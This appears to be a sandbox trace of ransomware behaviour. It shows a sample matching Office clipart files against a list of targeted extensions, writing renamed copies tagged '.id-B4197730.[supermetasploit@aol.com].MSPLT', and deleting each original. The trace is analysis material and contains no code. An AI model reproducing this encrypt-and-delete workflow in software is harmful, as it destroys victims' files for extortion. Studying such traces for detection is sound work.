[0319.903] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.904] lstrlenW (lpString=".doc") returned 4 [0319.904] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.904] lstrlenW (lpString=".docx") returned 5 [0319.904] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.904] lstrlenW (lpString=".pdf") returned 4 [0319.904] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.904] lstrlenW (lpString=".xls") returned 4 [0319.904] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.904] lstrlenW (lpString=".xlsx") returned 5 [0319.904] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.904] lstrlenW (lpString=".ppt") returned 4 [0319.904] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.904] lstrlenW (lpString=".zip") returned 4 [0319.904] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.904] lstrlenW (lpString=".rar") returned 4 [0319.904] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.904] lstrlenW (lpString=".bz2") returned 4 [0319.904] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.905] lstrlenW (lpString=".7z") returned 3 [0319.905] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.905] lstrlenW (lpString=".dbf") returned 4 [0319.905] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.905] lstrlenW (lpString=".1cd") returned 4 [0319.905] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.905] lstrlenW (lpString=".jpg") returned 4 [0319.905] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.905] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.905] lstrlenW (lpString="DD00687_.WMF") returned 12 [0319.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0319.906] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=20784) returned 1 [0319.907] CloseHandle (hObject=0x420) returned 1 [0319.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf")) returned 0x220 [0319.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0319.908] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.908] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0319.909] GetLastError () returned 0x0 [0319.909] ReadFile (in: hFile=0x420, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x5130, lpOverlapped=0x0) returned 1 [0320.226] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x5140, lpOverlapped=0x0) returned 1 [0320.228] ReadFile (in: hFile=0x420, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0320.228] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0320.228] SetEndOfFile (hFile=0x53c) returned 1 [0320.228] CloseHandle (hObject=0x53c) returned 1 [0320.229] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0320.229] SetEndOfFile (hFile=0x420) returned 1 [0320.234] CloseHandle (hObject=0x420) returned 1 [0320.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.235] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf")) returned 1 [0320.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.236] lstrlenW (lpString=".doc") returned 4 [0320.236] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.236] lstrlenW (lpString=".docx") returned 5 [0320.236] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.236] lstrlenW (lpString=".pdf") returned 4 [0320.236] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.236] lstrlenW (lpString=".xls") returned 4 [0320.236] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.236] lstrlenW (lpString=".xlsx") returned 5 [0320.236] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.237] lstrlenW (lpString=".ppt") returned 4 [0320.237] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.237] lstrlenW (lpString=".zip") returned 4 [0320.237] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.237] lstrlenW (lpString=".rar") returned 4 [0320.237] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.237] lstrlenW (lpString=".bz2") returned 4 [0320.237] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.237] lstrlenW (lpString=".7z") returned 3 [0320.237] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.237] lstrlenW (lpString=".dbf") returned 4 [0320.237] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.237] lstrlenW (lpString=".1cd") returned 4 [0320.237] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.238] lstrlenW (lpString=".jpg") returned 4 [0320.238] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.238] lstrlenW (lpString=".doc") returned 4 [0320.238] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.238] lstrlenW (lpString=".docx") returned 5 [0320.238] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.239] lstrlenW (lpString=".pdf") returned 4 [0320.239] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.239] lstrlenW (lpString=".xls") returned 4 [0320.239] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.239] lstrlenW (lpString=".xlsx") returned 5 [0320.239] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.239] lstrlenW (lpString=".ppt") returned 4 [0320.239] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.239] lstrlenW (lpString=".zip") returned 4 [0320.239] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.239] lstrlenW (lpString=".rar") returned 4 [0320.239] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.239] lstrlenW (lpString=".bz2") returned 4 [0320.239] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.239] lstrlenW (lpString=".7z") returned 3 [0320.239] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.239] lstrlenW (lpString=".dbf") returned 4 [0320.239] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.239] lstrlenW (lpString=".1cd") returned 4 [0320.239] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 68 [0320.240] lstrlenW (lpString=".jpg") returned 4 [0320.240] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.240] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.240] lstrlenW (lpString="DD01140_.WMF") returned 12 [0320.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0320.241] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=3616) returned 1 [0320.241] CloseHandle (hObject=0x420) returned 1 [0320.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf")) returned 0x220 [0320.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0320.243] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0320.243] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0320.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.244] GetLastError () returned 0x0 [0320.244] ReadFile (in: hFile=0x420, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xe20, lpOverlapped=0x0) returned 1 [0320.250] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xe30, lpOverlapped=0x0) returned 1 [0320.252] ReadFile (in: hFile=0x420, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0320.252] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0320.252] SetEndOfFile (hFile=0x53c) returned 1 [0320.252] CloseHandle (hObject=0x53c) returned 1 [0320.252] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0320.252] SetEndOfFile (hFile=0x420) returned 1 [0320.262] CloseHandle (hObject=0x420) returned 1 [0320.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.263] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf")) returned 1 [0320.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.264] lstrlenW (lpString=".doc") returned 4 [0320.264] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.264] lstrlenW (lpString=".docx") returned 5 [0320.264] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.264] lstrlenW (lpString=".pdf") returned 4 [0320.264] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.264] lstrlenW (lpString=".xls") returned 4 [0320.264] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.265] lstrlenW (lpString=".xlsx") returned 5 [0320.265] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.265] lstrlenW (lpString=".ppt") returned 4 [0320.265] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.265] lstrlenW (lpString=".zip") returned 4 [0320.265] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.265] lstrlenW (lpString=".rar") returned 4 [0320.265] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.265] lstrlenW (lpString=".bz2") returned 4 [0320.265] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.265] lstrlenW (lpString=".7z") returned 3 [0320.265] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.265] lstrlenW (lpString=".dbf") returned 4 [0320.265] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.265] lstrlenW (lpString=".1cd") returned 4 [0320.265] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.265] lstrlenW (lpString=".jpg") returned 4 [0320.265] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.266] lstrlenW (lpString=".doc") returned 4 [0320.266] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.266] lstrlenW (lpString=".docx") returned 5 [0320.266] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.266] lstrlenW (lpString=".pdf") returned 4 [0320.266] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.266] lstrlenW (lpString=".xls") returned 4 [0320.266] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.266] lstrlenW (lpString=".xlsx") returned 5 [0320.266] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.266] lstrlenW (lpString=".ppt") returned 4 [0320.266] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.266] lstrlenW (lpString=".zip") returned 4 [0320.266] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.266] lstrlenW (lpString=".rar") returned 4 [0320.266] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.266] lstrlenW (lpString=".bz2") returned 4 [0320.266] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.266] lstrlenW (lpString=".7z") returned 3 [0320.266] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.266] lstrlenW (lpString=".dbf") returned 4 [0320.266] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.267] lstrlenW (lpString=".1cd") returned 4 [0320.267] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0320.267] lstrlenW (lpString=".jpg") returned 4 [0320.267] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.267] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.267] lstrlenW (lpString="DD01143_.WMF") returned 12 [0320.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0320.268] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=2140) returned 1 [0320.268] CloseHandle (hObject=0x420) returned 1 [0320.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf")) returned 0x220 [0320.657] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0321.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0321.778] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.778] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x55c [0321.779] GetLastError () returned 0x0 [0321.779] ReadFile (in: hFile=0x548, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x85c, lpOverlapped=0x0) returned 1 [0321.810] WriteFile (in: hFile=0x55c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x860, lpOverlapped=0x0) returned 1 [0321.812] ReadFile (in: hFile=0x548, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0321.812] WriteFile (in: hFile=0x55c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0321.813] SetEndOfFile (hFile=0x55c) returned 1 [0321.813] CloseHandle (hObject=0x55c) returned 1 [0321.813] SetFilePointerEx (in: hFile=0x548, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.813] SetEndOfFile (hFile=0x548) returned 1 [0321.818] CloseHandle (hObject=0x548) returned 1 [0321.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0321.819] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf")) returned 1 [0321.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.820] lstrlenW (lpString=".doc") returned 4 [0321.820] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0321.820] lstrlenW (lpString=".docx") returned 5 [0321.820] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0321.820] lstrlenW (lpString=".pdf") returned 4 [0321.820] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0321.820] lstrlenW (lpString=".xls") returned 4 [0321.821] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0321.821] lstrlenW (lpString=".xlsx") returned 5 [0321.821] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0321.821] lstrlenW (lpString=".ppt") returned 4 [0321.821] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0321.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.821] lstrlenW (lpString=".zip") returned 4 [0321.821] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0321.821] lstrlenW (lpString=".rar") returned 4 [0321.821] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0321.821] lstrlenW (lpString=".bz2") returned 4 [0321.821] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0321.822] lstrlenW (lpString=".7z") returned 3 [0321.822] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0321.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.822] lstrlenW (lpString=".dbf") returned 4 [0321.822] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0321.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.823] lstrlenW (lpString=".1cd") returned 4 [0321.823] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0321.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.823] lstrlenW (lpString=".jpg") returned 4 [0321.824] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0321.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.824] lstrlenW (lpString=".doc") returned 4 